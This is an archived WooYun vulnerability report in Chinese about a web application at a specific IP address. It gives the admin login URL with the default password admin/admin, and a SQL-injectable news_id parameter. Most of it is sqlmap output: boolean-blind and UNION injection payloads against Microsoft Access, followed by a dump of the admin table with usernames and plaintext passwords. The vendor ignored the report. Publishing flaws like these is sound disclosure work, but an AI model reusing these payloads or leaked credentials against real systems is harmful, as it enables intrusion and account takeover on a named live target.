乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-02: 细节已通知厂商并且等待厂商处理中 2015-07-07: 厂商已经主动忽略漏洞,细节向公众公开
小洞
1.编辑器弱口令http://124.239.192.65/erp/shadmin/editpage/Admin_Login.asp?action=loginadmin admin 2.注入http://124.239.192.65/zsjy/zpxx_0.asp?news_id=1
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:---Parameter: news_id (GET) Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original value) Payload: news_id=IIF(8731=8731,1,1/0) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: news_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(107)&CHR(106)&CHR(112)&CHR(113)&CHR(112)&CHR(112)&CHR(108)&CHR(87)&CHR(73)&CHR(121)&CHR(111)&CHR(105)&CHR(68)&CHR(108)&CHR(113)&CHR(98)&CHR(122)&CHR(107)&CHR(113) FROM MSysAccessObjects%16---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Accesssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: news_id (GET) Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace (original value) Payload: news_id=IIF(8731=8731,1,1/0) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: news_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(107)&CHR(106)&CHR(112)&CHR(113)&CHR(112)&CHR(112)&CHR(108)&CHR(87)&CHR(73)&CHR(121)&CHR(111)&CHR(105)&CHR(68)&CHR(108)&CHR(113)&CHR(98)&CHR(122)&CHR(107)&CHR(113) FROM MSysAccessObjects%16---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[2 tables]+-------+| admin || news |+-------+
Database: Microsoft_Access_masterdbTable: admin[2 entries]+----+------+-----------+----------+| id | data | user | password |+----+------+-----------+----------+| 1 | <blank> | ad`in | jyb_yuan || 2 | <blank> | admin_qin | jyb_qin |+----+------+-----------+----------+
1.加固弱口令2.过了特殊字符
危害等级:无影响厂商忽略
忽略时间:2015-07-07 15:16
暂无